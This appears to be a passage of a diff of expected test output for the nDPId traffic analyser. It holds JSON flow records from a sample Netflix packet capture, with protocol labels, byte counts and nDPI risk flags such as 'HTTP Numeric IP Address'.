-00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1484319035080,"flow_last_seen":1484319073578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39376,"flow_avg_l4_payload_len":570,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1484319033886,"flow_last_seen":1484319113019,"flow_idle_time":180000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1484319043012,"flow_last_seen":1484319085476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":42483,"flow_avg_l4_payload_len":674,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1484319043013,"flow_last_seen":1484319077933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":119751,"flow_avg_l4_payload_len":950,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1484319043665,"flow_last_seen":1484319075730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11829,"flow_avg_l4_payload_len":563,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":637,"flow_first_seen":1484319049672,"flow_last_seen":1484319109285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":702214,"flow_avg_l4_payload_len":1102,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319114406,"flow_last_seen":1484319117555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8880,"flow_avg_l4_payload_len":286,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00811{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1484319117651,"flow_last_seen":1484319117994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8767,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118657,"flow_last_seen":1484319120726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32245,"flow_avg_l4_payload_len":786,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118658,"flow_last_seen":1484319120053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39341,"flow_avg_l4_payload_len":959,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319032865,"flow_last_seen":1484319032884,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1484319035079,"flow_last_seen":1484319073564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10839,"flow_avg_l4_payload_len":270,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1484319035080,"flow_last_seen":1484319073578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39376,"flow_avg_l4_payload_len":570,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1484319035342,"flow_last_seen":1484319066108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6543,"flow_avg_l4_payload_len":261,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319114365,"flow_last_seen":1484319114400,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1484319117605,"flow_last_seen":1484319119338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26449,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319114365,"flow_last_seen":1484319114400,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1484319117605,"flow_last_seen":1484319119338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26449,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":52,"flow_first_seen":1484319117826,"flow_last_seen":1484319118687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22434,"flow_avg_l4_payload_len":431,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1484319117827,"flow_last_seen":1484319118041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":245,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319050652,"flow_last_seen":1484319052229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41415,"flow_avg_l4_payload_len":781,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319052216,"flow_last_seen":1484319054100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43240,"flow_avg_l4_payload_len":745,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319054101,"flow_last_seen":1484319056189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43241,"flow_avg_l4_payload_len":786,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1484319056204,"flow_last_seen":1484319063297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21464,"flow_avg_l4_payload_len":429,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1484319056210,"flow_last_seen":1484319062135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28763,"flow_avg_l4_payload_len":587,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056214,"flow_last_seen":1484319063597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21524,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319056221,"flow_last_seen":1484319063369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26939,"flow_avg_l4_payload_len":508,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1484319056232,"flow_last_seen":1484319064277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":428,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056233,"flow_last_seen":1484319063283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":25507,"flow_avg_l4_payload_len":463,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1484319056233,"flow_last_seen":1484319063789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":469,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1484319056234,"flow_last_seen":1484319063566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35980,"flow_avg_l4_payload_len":599,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056241,"flow_last_seen":1484319062003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24422,"flow_avg_l4_payload_len":444,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056264,"flow_last_seen":1484319064524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21416,"flow_avg_l4_payload_len":396,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}}
